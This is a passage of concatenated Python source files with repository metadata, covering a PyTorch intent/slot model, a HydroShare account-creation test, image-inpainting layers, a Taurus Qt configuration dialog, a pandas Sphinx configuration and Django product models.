self.LayerNorm_I = nn.LayerNorm(hidden_size)
self.LayerNorm_S = nn.LayerNorm(hidden_size)
self.dropout = nn.Dropout(dropout)
self.device = device
def forward(self, hidden_states_I, hidden_states_S):
# hidden_states_I: [batch size, seq len, hidden_dim]
# hidden_states_S: [batch size, seq len, hidden_dim]
hidden_states_in = torch.cat([hidden_states_I, hidden_states_S], dim=2) # [batch size, seq len, hidden_dim*2]
batch_size, seq_length, hidden = hidden_states_in.size()
#context word window
h_pad = torch.zeros(batch_size, 1, hidden).to(self.device) # [batch size, 1, hidden_dim*2]
h_left = torch.cat([h_pad, hidden_states_in[:, :seq_length - 1, :]], dim=1) # [batch size, seq len, hidden_dim*2]
h_right = torch.cat([hidden_states_in[:, 1:, :], h_pad], dim=1) # [batch size, seq len, hidden_dim*2]
hidden_states_in = torch.cat([hidden_states_in, h_left, h_right], dim=2) # [batch size, seq len, hidden_dim*6]
hidden_states = self.dense_in(hidden_states_in) # [batch size, seq len, hidden_dim]
hidden_states = self.intermediate_act_fn(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.dense_out(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.dropout(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states_I_NEW = self.LayerNorm_I(hidden_states + hidden_states_I) # [batch size, seq len, hidden_dim]
hidden_states_S_NEW = self.LayerNorm_S(hidden_states + hidden_states_S) # [batch size, seq len, hidden_dim]
return hidden_states_I_NEW, hidden_states_S_NEW
class SelfOutput(nn.Module):
def __init__(self, hidden_size, dropout):
super(SelfOutput, self).__init__()
self.dense = nn.Linear(hidden_size, hidden_size)
self.Layer_norm = nn.LayerNorm(hidden_size)
self.dropout = nn.Dropout(dropout)
def forward(self, hidden_states, input_tensor):
# hidden_states: [batch size, seq len, hidden_dim]
# input_tensor: [batch size, seq len, hidden_dim]
hidden_states = self.dense(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.dropout(hidden_states) # [batch size, seq len, hidden_dim]
hidden_states = self.Layer_norm(hidden_states + input_tensor) # [batch size, seq len, hidden_dim]
return hidden_states
class I_S_SelfAttention(nn.Module):
def __init__(self, hidden_size, n_heads, dropout, device):
super(I_S_SelfAttention, self).__init__()
assert hidden_size % n_heads == 0
self.hidden_size = hidden_size
self.n_heads = n_heads
self.head_dim = hidden_size // n_heads
self.query = nn.Linear(hidden_size, hidden_size)
self.query_slot = nn.Linear(hidden_size, hidden_size)
self.key = nn.Linear(hidden_size, hidden_size)
self.key_slot = nn.Linear(hidden_size, hidden_size)
self.value = nn.Linear(hidden_size, hidden_size)
self.value_slot = nn.Linear(hidden_size, hidden_size)
self.dropout = nn.Dropout(dropout)
self.scale = torch.sqrt(torch.FloatTensor([self.head_dim])).to(device)
def forward(self, intent, slot, mask):
# intent: [batch size, seq len, hidden_dim]
# slot: [batch size, seq len, hidden_dim]
# mask: [batch size, seq len]
extended_attention_mask = mask.unsqueeze(1).unsqueeze(2) #[batch size, 1, 1, seq len]
attention_mask = (1.0 - extended_attention_mask) * -10000.0 #[batch size, 1, 1, seq len]
batch_size = intent.shape[0]
mixed_query_layer = self.query(intent) # [batch size, seq len, hidden_dim]
mixed_key_layer = self.key(slot) # [batch size, seq len, hidden_dim]
mixed_value_layer = self.value(slot) # [batch size, seq len, hidden_dim]
mixed_query_layer_slot = self.query_slot(slot) # [batch size, seq len, hidden_dim]
mixed_key_layer_slot = self.key_slot(intent) # [batch size, seq len, hidden_dim]
mixed_value_layer_slot = self.value_slot(intent) # [batch size, seq len, hidden_dim]
query_layer = mixed_query_layer.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
key_layer = mixed_key_layer.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
value_layer = mixed_value_layer.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
query_layer_slot = mixed_query_layer_slot.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
key_layer_slot = mixed_key_layer_slot.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
value_layer_slot = mixed_value_layer_slot.view(batch_size, -1, self.n_heads, self.head_dim).permute(0, 2, 1, 3) # [batch size, n heads, seq len, head dim]
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2)) / self.scale # [batch size, n heads, seq len, seq len]
attention_scores = attention_scores + attention_mask # [batch size, n heads, seq len, seq len]
attention_probs = torch.softmax(attention_scores, dim = -1) # [batch size, n heads, seq len, seq len]
context_layer = torch.matmul(self.dropout(attention_probs), value_layer) # [batch size, n heads, seq len, head dim]
context_layer = context_layer.permute(0, 2, 1, 3).contiguous() # [batch size, seq len, n heads, head dim]
context_layer = context_layer.view(batch_size, -1, self.hidden_size) # [batch size, seq len, hidden_dim]
attention_scores_slot = torch.matmul(query_layer_slot, key_layer_slot.transpose(-1, -2)) / self.scale # [batch size, n heads, seq len, seq len]
attention_scores_slot = attention_scores_slot + attention_mask # [batch size, n heads, seq len, seq len]
attention_probs_slot = torch.softmax(attention_scores_slot, dim = -1) # [batch size, n heads, seq len, seq len]
context_layer_slot = torch.matmul(self.dropout(attention_probs_slot), value_layer_slot) # [batch size, n heads, seq len, head dim]
context_layer_slot = context_layer_slot.permute(0, 2, 1, 3).contiguous() # [batch size, seq len, n heads, head dim]
context_layer_slot = context_layer_slot.view(batch_size, -1, self.hidden_size) # [batch size, seq len, hidden_dim]
return context_layer, context_layer_slot
class Joint_model(nn.Module):
def __init__(self, embed_dim, hidden_dim, n_class, n_tag, vocab_size, n_heads, dropout, device):
super(Joint_model, self).__init__()
self.embed_dim = embed_dim
self.hidden_dim = hidden_dim
self.n_class = n_class
self.n_tag = n_tag
self.vocab_size = vocab_size
self.n_heads = n_heads
self.dropout = dropout
self.device = device
self.embed = nn.Embedding(self.vocab_size, self.embed_dim, padding_idx=0)
self.biLSTM = nn.LSTM(self.embed_dim, self.hidden_dim // 2, bidirectional=True, batch_first=True)
self.intent_fc = nn.Linear(self.hidden_dim, self.n_class)
self.slot_fc = nn.Linear(self.hidden_dim, self.n_tag)
self.I_S_Emb = Label_Attention(self.intent_fc, self.slot_fc)
self.T_block = I_S_Block(self.hidden_dim, self.n_heads, self.dropout, self.device)
self.crflayer = CRF(self.n_tag)
self.criterion = nn.CrossEntropyLoss()
def forward_logit(self, inputs, mask):
# inputs:[batch size, seq len]
# mask:[batch size, seq len]
embeds = self.embed(inputs) # [batch size, seq len, embed_dim]
H, (_, _) = self.biLSTM(embeds) #[batch size, seq len, hidden_dim]
H_I, H_S = self.I_S_Emb(H, H)
#H_I: [batch size, seq len, hidden_dim]
#H_S: [batch size, seq len, hidden_dim]
H_I, H_S = self.T_block(H_I + H, H_S + H, mask)
#H_I: [batch size, seq len, hidden_dim]
#H_S: [batch size, seq len, hidden_dim]
intent_input = F.max_pool1d((H_I + H).transpose(1, 2), H_I.size(1)).squeeze(2) #[batch size, hidden_dim]
logits_intent = self.intent_fc(intent_input) #[batch size, n_class]
logits_slot = self.slot_fc(H_S + H) #[batch size, seq len, n_tag]
return logits_intent, logits_slot
def loss(self, logits_intent, logits_slot, intent_label, slot_label, mask):
loss_intent = self.criterion(logits_intent, intent_label)
logits_slot = logits_slot.transpose(1, 0)
slot_label = slot_label.transpose(1, 0)
mask = mask.transpose(1, 0)
loss_slot = -self.crflayer(logits_slot, slot_label, mask) / logits_intent.size()[0]
return loss_intent, loss_slot
def pred_intent_slot(self, logits_intent, logits_slot, mask):
pred_intent = torch.max(logits_intent, 1)[1]
mask = mask.transpose(1, 0)
logits_slot = logits_slot.transpose(1, 0)
pred_slot = self.crflayer.decode(logits_slot, mask=mask)
return pred_intent, pred_slot
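# Editor's note: a hedged shape check, not part of the module. The hyperparameters are arbitrary,
# and running it assumes the local crf module imported at the top is available; the CRF layer
# itself is not exercised here because only forward_logit() is called.
if __name__ == "__main__":
    device = torch.device('cpu')
    model = Joint_model(embed_dim=32, hidden_dim=64, n_class=5, n_tag=7,
                        vocab_size=100, n_heads=4, dropout=0.1, device=device)
    inputs = torch.randint(1, 100, (2, 10))  # [batch size, seq len]
    mask = torch.ones(2, 10)                 # 1 = real token, 0 = padding
    logits_intent, logits_slot = model.forward_logit(inputs, mask)
    print(logits_intent.shape)               # torch.Size([2, 5])
    print(logits_slot.shape)                 # torch.Size([2, 10, 7])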
avg_line_length: 58.921569 | max_line_length: 162 | alphanum_fraction: 0.675291

hexsha: 9863a92f017b8cb127004c21f35767ccbeae52b7 | size: 2,060 | ext: py | lang: Python
path: hs_access_control/tests/test_create_user.py
repo: tommac7/hydroshare | head_hexsha: 87c4543a55f98103d2614bf4c47f7904c3f9c029 | licenses: ["BSD-3-Clause"]
max_stars_count: 178 (2015-01-08T23:03:36.000Z to 2022-03-03T13:56:45.000Z)
max_issues_count: 4,125 (2015-01-01T14:26:15.000Z to 2022-03-31T16:38:55.000Z)
max_forks_count: 53 (2015-03-15T17:56:51.000Z to 2022-03-17T00:32:16.000Z)

content:
from django.test import TestCase
from django.contrib.auth.models import Group
from hs_core import hydroshare
from hs_core.testing import MockIRODSTestCaseMixin
from hs_access_control.tests.utilities import global_reset, \
assertUserResourceState, assertUserGroupState
class T01CreateUser(MockIRODSTestCaseMixin, TestCase):
def setUp(self):
super(T01CreateUser, self).setUp()
global_reset()
self.group, _ = Group.objects.get_or_create(name='Hydroshare Author')
self.admin = hydroshare.create_account(
'admin@gmail.com',
username='admin',
first_name='administrator',
last_name='couch',
superuser=True,
groups=[]
)
self.cat = hydroshare.create_account(
'cat@gmail.com',
username='cat',
first_name='not a dog',
last_name='last_name_cat',
superuser=False,
groups=[]
)
self.dpg = hydroshare.create_account(
'dog@gmail.com',
username='dog',
first_name='a little',
last_name='arfer',
superuser=False,
groups=[]
)
def test_01_create_state(self):
"""User state is correct after creation"""
# check that privileged user was created correctly
self.assertEqual(self.admin.uaccess.user.username, 'admin')
self.assertEqual(self.admin.uaccess.user.first_name, 'administrator')
self.assertTrue(self.admin.is_active)
# start as privileged user
assertUserResourceState(self, self.admin, [], [], [])
# check that unprivileged user was created correctly
self.assertEqual(self.cat.uaccess.user.username, 'cat')
self.assertEqual(self.cat.uaccess.user.first_name, 'not a dog')
self.assertTrue(self.cat.is_active)
# check that user cat owns and holds nothing
assertUserResourceState(self, self.cat, [], [], [])
assertUserGroupState(self, self.cat, [], [], [])
avg_line_length: 32.1875 | max_line_length: 77 | alphanum_fraction: 0.622816

hexsha: 5aca24ca63acf9673d2965b0d1d03078133f8c63 | size: 10,552 | ext: py | lang: Python
path: src/layers.py
repo: zigonk/MST_inpainting | head_hexsha: a06d8b433cda61f7f972abebcd0363b49943566d | licenses: ["MIT"]
max_stars_count: 30 (2021-03-29T06:14:07.000Z to 2022-01-24T03:38:34.000Z)
max_issues_count: 1 (2021-08-15T03:39:58.000Z to 2021-10-06T09:25:55.000Z)
max_forks_count: 6 (2021-11-10T03:49:47.000Z to 2022-03-18T03:38:18.000Z)

content:
import torch
import torch.nn as nn
import torch.nn.functional as F
class BaseNetwork(nn.Module):
def __init__(self):
super(BaseNetwork, self).__init__()
def init_weights(self, init_type='normal', gain=0.02):
'''
initialize network's weights
init_type: normal | xavier | kaiming | orthogonal
https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix/blob/9451e70673400885567d08a9e97ade2524c700d0/models/networks.py#L39
'''
def init_func(m):
classname = m.__class__.__name__
if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
if init_type == 'normal':
nn.init.normal_(m.weight.data, 0.0, gain)
elif init_type == 'xavier':
nn.init.xavier_normal_(m.weight.data, gain=gain)
elif init_type == 'kaiming':
nn.init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
elif init_type == 'orthogonal':
nn.init.orthogonal_(m.weight.data, gain=gain)
if hasattr(m, 'bias') and m.bias is not None:
nn.init.constant_(m.bias.data, 0.0)
elif classname.find('BatchNorm2d') != -1:
nn.init.normal_(m.weight.data, 1.0, gain)
nn.init.constant_(m.bias.data, 0.0)
self.apply(init_func)
class GateConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, transpose=False):
super(GateConv, self).__init__()
self.out_channels = out_channels
if transpose:
self.gate_conv = nn.ConvTranspose2d(in_channels, out_channels * 2,
kernel_size=kernel_size,
stride=stride, padding=padding)
else:
self.gate_conv = nn.Conv2d(in_channels, out_channels * 2,
kernel_size=kernel_size,
stride=stride, padding=padding)
def forward(self, x):
x = self.gate_conv(x)
(x, g) = torch.split(x, self.out_channels, dim=1)
return x * torch.sigmoid(g)
class Conv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, transpose=False,
use_spectral_norm=False):
super(Conv, self).__init__()
self.out_channels = out_channels
if transpose:
self.conv = nn.ConvTranspose2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride,
padding=padding, bias=not use_spectral_norm)
else:
self.conv = nn.Conv2d(in_channels, out_channels,
kernel_size=kernel_size, stride=stride,
padding=padding, bias=not use_spectral_norm)
if use_spectral_norm:
self.conv = spectral_norm(self.conv)
def forward(self, x):
return self.conv(x)
class SNGateConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, dilation=1,
transpose=False):
super(SNGateConv, self).__init__()
self.out_channels = out_channels
if transpose:
self.gate_conv = spectral_norm(nn.ConvTranspose2d(in_channels, out_channels * 2,
kernel_size=kernel_size, bias=False,
stride=stride, padding=padding,
dilation=dilation), mode=True)
else:
self.gate_conv = spectral_norm(nn.Conv2d(in_channels, out_channels * 2,
kernel_size=kernel_size, bias=False,
stride=stride, padding=padding,
dilation=dilation), mode=True)
def forward(self, x):
x = self.gate_conv(x)
(x, g) = torch.split(x, self.out_channels, dim=1)
return x * torch.sigmoid(g)
class SeparableDecoder(nn.Module):
def __init__(self, input_channels, emb_channels, output_channel=None, stride=1):
super(SeparableDecoder, self).__init__()
self.emb_ch = emb_channels
self.deconv_ch = input_channels // 2 if stride == 2 else input_channels
self.decoder_conv = nn.Sequential(
SNGateConv(in_channels=input_channels, out_channels=self.deconv_ch, kernel_size=3 if stride == 1 else 4,
stride=stride, padding=1, transpose=True if stride > 1 else False),
nn.InstanceNorm2d(self.deconv_ch, track_running_stats=False),
nn.ReLU(True)
)
self.emb_head = nn.Sequential(
nn.Conv2d(self.deconv_ch, emb_channels * 2, kernel_size=3, stride=1, padding=1),
nn.InstanceNorm2d(emb_channels * 2, track_running_stats=False),
nn.ReLU(True)
)
self.att_head = nn.Sequential(
nn.Conv2d(emb_channels * 2, emb_channels, kernel_size=3, stride=1, padding=1),
nn.InstanceNorm2d(emb_channels, track_running_stats=False),
nn.ReLU(True),
nn.Conv2d(in_channels=emb_channels, out_channels=1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
self.to_edge = nn.Sequential(
nn.Conv2d(emb_channels, 1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
self.to_line = nn.Sequential(
nn.Conv2d(emb_channels, 1, kernel_size=3, stride=1, padding=1),
nn.Sigmoid()
)
self.to_rgb = nn.Sequential(
nn.Conv2d(emb_channels, 3, kernel_size=3, stride=1, padding=1),
nn.Tanh()
)
if output_channel is not None:
self.proj = nn.Conv2d(in_channels=self.deconv_ch + emb_channels,
out_channels=output_channel, kernel_size=1, stride=1, padding=0)
else:
self.proj = None
def forward(self, x):
x = self.decoder_conv(x)
emb = self.emb_head(x)
e, l = torch.split(emb, self.emb_ch, dim=1)
edge = self.to_edge(e)
line = self.to_line(l)
att = self.att_head(emb)
x_combine = e * att + l * (1 - att)
rgb = self.to_rgb(x_combine)
# rgb = (rgb + 1) / 2
if self.proj:
x_out = torch.cat([x, x_combine], dim=1) # deconv_ch+emb
x_out = self.proj(x_out)
return x_out, rgb, edge, line, att
else:
return rgb, edge, line, att
class EfficientAttention(nn.Module):
def __init__(self, in_channels, dim, head_count, out_channels):
super().__init__()
self.in_channels = in_channels
self.head_count = head_count
self.dim = dim
self.keys = nn.Conv2d(in_channels, dim, 1)
self.queries = nn.Conv2d(in_channels, dim, 1)
self.values = nn.Conv2d(in_channels, dim, 1)
if dim != out_channels:
self.reprojection = nn.Conv2d(dim, out_channels, 1)
else:
self.reprojection = None
def forward(self, input_, mask=None, return_scores=False):
n, _, h, w = input_.size()
keys = self.keys(input_)
queries = self.queries(input_)
values = self.values(input_)
head_channels = self.dim // self.head_count
if mask is not None:
# [b,1,h,w]
mask = F.interpolate(mask, size=[h, w], mode='nearest')
keys += (mask * -10000.0)
queries += (mask * -10000.0)
keys = keys.reshape((n, self.dim, h * w)) # [b,d,h*w]
queries = queries.reshape(n, self.dim, h * w)
values = values.reshape((n, self.dim, h * w))
attended_values = []
scores = 0
for i in range(self.head_count):
key = F.softmax(keys[:, i * head_channels: (i + 1) * head_channels, :], dim=2)
query = F.softmax(queries[:, i * head_channels: (i + 1) * head_channels, :], dim=1)
value = values[:, i * head_channels: (i + 1) * head_channels, :]
context = key @ value.transpose(1, 2) # [b, d, d]
attended_value = (context.transpose(1, 2) @ query).reshape(n, head_channels, h, w)
attended_values.append(attended_value)
if return_scores:
score = torch.matmul(query.transpose(1, 2), key) # [b, hw, hw]
score = torch.mean(score, dim=1).reshape([n, h, w])
scores += score
aggregated_values = torch.cat(attended_values, dim=1)
if self.reprojection is not None:
reprojected_value = self.reprojection(aggregated_values)
else:
reprojected_value = aggregated_values
attention = reprojected_value + input_
if return_scores:
max_value, _ = torch.max(scores.reshape([n, h * w]), dim=1)
max_value = max_value[:, None, None]
scores = scores / (max_value + 1e-5)
scores = scores.unsqueeze(1)
scores = scores.detach()
return attention, scores
else:
return attention
class ResnetBlock(nn.Module):
def __init__(self, dim, dilation=1, use_spectral_norm=False):
super(ResnetBlock, self).__init__()
self.conv_block = nn.Sequential(
nn.ReflectionPad2d(dilation),
spectral_norm(nn.Conv2d(in_channels=dim, out_channels=dim, kernel_size=3, padding=0, dilation=dilation,
bias=not use_spectral_norm), use_spectral_norm),
nn.InstanceNorm2d(dim, track_running_stats=False),
nn.ReLU(True),
nn.ReflectionPad2d(1),
spectral_norm(nn.Conv2d(in_channels=dim, out_channels=dim, kernel_size=3, padding=0, dilation=1,
bias=not use_spectral_norm), use_spectral_norm),
nn.InstanceNorm2d(dim, track_running_stats=False),
)
def forward(self, x):
out = x + self.conv_block(x)
# Remove ReLU at the end of the residual block
# http://torch.ch/blog/2016/02/04/resnets.html
return out
def spectral_norm(module, mode=True):
if mode:
return nn.utils.spectral_norm(module)
return module
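# Editor's note: a hedged shape check, not part of the module; the channel sizes are arbitrary.
# EfficientAttention keeps the spatial resolution and (here) the channel count, and the optional
# mask marks regions whose keys/queries are suppressed before the softmax.
if __name__ == "__main__":
    attn = EfficientAttention(in_channels=32, dim=32, head_count=4, out_channels=32)
    feat = torch.randn(2, 32, 16, 16)
    hole_mask = torch.zeros(2, 1, 64, 64)  # 1 = masked-out pixel; resized to 16x16 internally
    out, scores = attn(feat, mask=hole_mask, return_scores=True)
    print(out.shape)     # torch.Size([2, 32, 16, 16])
    print(scores.shape)  # torch.Size([2, 1, 16, 16])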
avg_line_length: 41.380392 | max_line_length: 132 | alphanum_fraction: 0.563779

hexsha: 1c6904a0bb5b30c127a87e05ee16d085d6dad797 | size: 2,361 | ext: py | lang: Python
path: lib/taurus/qt/qtgui/dialog/taurusconfigurationdialog.py
repo: MikeFalowski/taurus | head_hexsha: ef041bf35dd847caf08a7efbe072f4020d35522e | licenses: ["CC-BY-3.0"]
max_stars_count: 1 (2016-10-19T13:54:08.000Z to 2016-10-19T13:54:08.000Z)
max_issues_count: 27 (2016-05-25T08:56:58.000Z to 2019-01-21T09:18:08.000Z)
max_forks_count: 8 (2015-07-24T09:16:50.000Z to 2018-06-12T12:33:59.000Z)

content:
#!/usr/bin/env python
#############################################################################
##
# This file is part of Taurus
##
# http://taurus-scada.org
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Taurus is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Taurus is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Taurus. If not, see <http://www.gnu.org/licenses/>.
##
#############################################################################
"""This module provides a set of dialog based widgets"""
__all__ = ["TaurusConfigurationDialog"]
__docformat__ = 'restructuredtext'
from taurus.external.qt import Qt
from taurus.qt.qtgui.panel.taurusconfigurationpanel import TaurusConfigurationPanel
class TaurusConfigurationDialog(Qt.QDialog):
def __init__(self, parent=None, designMode=False):
Qt.QDialog.__init__(self, parent)
self.setWindowTitle('TaurusConfigurationDialog')
layout = Qt.QVBoxLayout()
self.setLayout(layout)
ConfigPanel = TaurusConfigurationPanel
self._panel = ConfigPanel(self)
layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._panel)
self._panel._ui.pushButtonOk.setVisible(True)
self._panel._ui.pushButtonCancel.setVisible(True)
self._panel._ui.pushButtonOk.clicked.connect(self._onOk)
self._panel._ui.pushButtonCancel.clicked.connect(self._onCancel)
self.adjustSize()
self.show()
def _onOk(self):
self._panel._onOk()
self._onCancel()
def _onCancel(self):
self.close()
def setModel(self, model):
self._panel.setModel(model)
def main():
import sys
attr_name = sys.argv[1]
a = Qt.QApplication([])
d = TaurusConfigurationDialog()
d.setModel(attr_name)
return a.exec_()
if __name__ == "__main__":
import sys
sys.exit(main())
avg_line_length: 31.065789 | max_line_length: 83 | alphanum_fraction: 0.659466

hexsha: 24ad80233e11f83a5b5a84e784395f5769767546 | size: 8,141 | ext: py | lang: Python
path: doc/source/conf.py
repo: timClicks/pandas | head_hexsha: 83b216c9efb439c1d19690feff1dcba58c6a2f88 | licenses: ["BSD-3-Clause"]
max_stars_count: 1 (2020-09-17T11:33:26.000Z to 2020-09-17T11:33:26.000Z)
max_issues_count: null
max_forks_count: null

content:
# -*- coding: utf-8 -*-
#
# pandas documentation build configuration file, created by
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../sphinxext'))
sys.path.extend([
# numpy standard doc extensions
os.path.join(os.path.dirname(__file__),
'..', '../..',
'sphinxext')
])
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones. sphinxext.
extensions = ['sphinx.ext.autodoc',
'sphinx.ext.doctest',
'numpydoc',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'sphinx.ext.autosummary',
'matplotlib.sphinxext.only_directives',
'matplotlib.sphinxext.plot_directive',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates', '_templates/autosummary']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pandas'
copyright = u'2008-2011, AQR Capital Management, LLC, pandas developers'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import pandas
# def svn_version():
# import os, subprocess, re, warnings
# env = os.environ.copy()
# env['LC_ALL'] = 'C'
# try:
# out = subprocess.Popen(['svn', 'info'], stdout=subprocess.PIPE,
# env=env).communicate()[0]
# except OSError:
# warnings.warn(" --- Could not run svn info --- ")
# return ""
# r = re.compile('Revision: ([0-9]+)')
# svnver = None
# for line in out.split('\n'):
# m = r.match(line)
# if m:
# svnver = m.group(1)
# if not svnver:
# raise ValueError("Error while parsing svn version ?")
# return svnver
# version = '%s r%s' % (pandas.__version__, svn_version())
version = '%s' % (pandas.__version__)
# The full version, including alpha/beta/rc tags.
release = version
# JP: added from sphinxdocs
autosummary_generate = True
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
#html_style = 'statsmodels.css'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'pandas'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pandas.tex', u'pandas Documentation',
u'Wes McKinney', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'http://docs.scipy.org/': None}
import glob
autosummary_generate = glob.glob("*.rst")
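# Note on the two autosummary_generate assignments: this final list assignment
# supersedes the earlier ``autosummary_generate = True`` above, restricting stub
# generation to the reST sources found in this directory.  A configuration like
# this is consumed when Sphinx is run against the containing directory, for
# example (illustrative invocation, paths assumed):
#
#     sphinx-build -b html doc/source doc/build/html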
| 31.800781 | 80 | 0.691193 |
3e2bf6c70b06cce43a8fd0037fcb1899c5e1e6f2 | 1,205 | py | Python | products/models.py | ZendaInnocent/simple-online-book-store | 211e57fe32dc239ea01ce1160b621670cd4b3afa | ["MIT"] | 1 | 2020-04-13T20:26:24.000Z | 2020-04-13T20:26:24.000Z | products/models.py | ZendaInnocent/simple-online-book-store | 211e57fe32dc239ea01ce1160b621670cd4b3afa | ["MIT"] | null | null | null | products/models.py | ZendaInnocent/simple-online-book-store | 211e57fe32dc239ea01ce1160b621670cd4b3afa | ["MIT"] | null | null | null |
from django.db import models
from django.urls import reverse
class ProductManager(models.Manager):
def active(self):
return self.filter(active=True)
class Product(models.Model):
name = models.CharField(max_length=50)
slug = models.SlugField()
description = models.TextField(blank=True)
price = models.DecimalField(max_digits=6, decimal_places=2)
in_stock = models.BooleanField(default=True)
updated = models.DateTimeField(auto_now=True)
active = models.BooleanField(default=True)
objects = ProductManager()
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('products:product-detail', kwargs={'slug': self.slug})
class ProductImage(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
thumbnail = models.ImageField(upload_to='product-thumbnails/', null=True)
image = models.ImageField(upload_to='product-images/')
class ProductTag(models.Model):
products = models.ManyToManyField(Product)
name = models.CharField(max_length=50)
slug = models.SlugField()
description = models.TextField(blank=True)
